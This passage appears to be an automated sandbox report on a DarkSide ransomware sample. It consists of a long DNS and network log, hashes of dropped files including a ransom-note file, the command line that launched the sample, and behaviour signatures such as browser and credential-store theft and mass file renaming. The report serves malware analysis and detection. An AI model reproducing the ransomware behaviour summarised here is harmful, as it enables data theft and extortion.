US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	0.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	1.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	71.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	4.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	0.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	33.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	17.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	21.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	66.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	119.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	124.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	126.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	127.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	34.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	39.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	52.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	56.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	59.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	60.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	61.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	48.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	62.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	65.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	63.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	67.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	70.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	72.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	73.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	79.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	92.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	91.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	94.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	64.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	95.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	97.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	101.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	102.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	107.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	24.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	96.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	109.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	110.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.165.165.52.in-addr.arpa	udp
US	8.8.8.8:53	124.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	11.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	6.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	8.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	12.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	9.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	127.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	126.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	57.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	95.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	7.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	119.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	14.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	23.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	110.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	101.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	19.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	27.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	25.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	3.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	15.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	42.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	38.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	41.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	31.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	5.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	54.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	121.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	125.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	122.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	123.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	118.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	117.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	116.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	120.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	115.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	114.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	113.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	112.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	111.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	108.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	106.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	105.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	104.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	103.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	99.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	98.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	93.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	90.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	88.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	85.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	84.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	83.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	82.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	81.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	80.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	78.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	76.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	75.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	74.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	69.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	68.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	128.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	77.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	89.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	87.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	86.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	100.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	46.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	47.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	44.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	52.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	40.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	37.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	35.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	36.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	50.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	34.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	122.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	125.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	123.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	121.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	105.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	106.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	103.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	111.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	118.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	112.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	108.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	113.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	114.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	187.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	173.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	158.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	157.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	165.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	169.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	171.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	174.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	175.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	176.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	177.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	178.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	179.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	180.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	181.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	182.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	183.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	186.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	188.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	189.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	190.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	191.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	193.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	194.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	198.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	166.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	129.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	130.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	131.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	132.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	133.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	134.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	135.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	137.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	138.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	139.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	140.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	141.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	146.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	148.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	136.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	149.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	150.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	208.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	216.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	217.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	223.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	226.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	230.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	237.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	239.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	242.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	245.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	247.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	252.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	143.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	205.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	204.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	203.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	202.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	200.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	197.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	196.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	195.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	206.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	212.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	253.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	250.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	249.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	244.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	243.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	241.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	240.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	238.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	236.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	235.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	234.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	232.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	231.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	229.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	228.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	248.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	225.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	224.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	222.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	221.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	220.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	219.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	218.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	215.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	214.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	210.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	207.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	192.142.123.92.in-addr.arpa	udp
US	8.8.8.8:53	164.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	142.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	173.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	187.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	161.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	185.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	167.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	159.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	170.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	145.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	147.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	155.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	151.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	153.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	169.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	160.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	163.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	162.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	156.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	168.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	154.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	152.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	166.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	246.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	237.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	184.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	230.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	227.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	239.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	223.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	144.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	205.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	204.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	203.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	196.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	206.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	212.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	202.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	201.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	195.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	200.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	199.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	197.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	253.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	251.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	249.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	250.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	241.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	240.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	244.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	238.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	248.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	235.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	224.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	225.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	228.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	234.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	229.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	231.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	236.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	232.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	233.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	243.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	213.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	214.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	222.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	254.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	211.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	209.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	221.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	218.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	215.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	220.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	210.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	207.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	219.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	172.214.232.199.in-addr.arpa	udp
US	8.8.8.8:53	25.140.123.92.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	11.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	26.35.223.20.in-addr.arpa	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	27.178.89.13.in-addr.arpa	udp

Files

memory/2420-1-0x00007FF869C93000-0x00007FF869C95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1u4mrdkd.pi2.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2420-3-0x00000214A4D70000-0x00000214A4D92000-memory.dmp

memory/2420-12-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-13-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-14-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

memory/2420-17-0x00007FF869C90000-0x00007FF86A751000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	556084f2c6d459c116a69d6fedcc4105
SHA1	633e89b9a1e77942d822d14de6708430a3944dbc
SHA256	88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512	0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	95e1c8db6eb5be60fa7c5f7ca36bfaed
SHA1	5b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9
SHA256	3b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18
SHA512	de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db

C:\Users\Admin\README.d3877f44.TXT

MD5	d4e176b40c4ea17f4870c34fad926d6e
SHA1	2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA256	7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512	feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

Analysis: behavioral21

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240705-en

Max time kernel

29s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (143) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
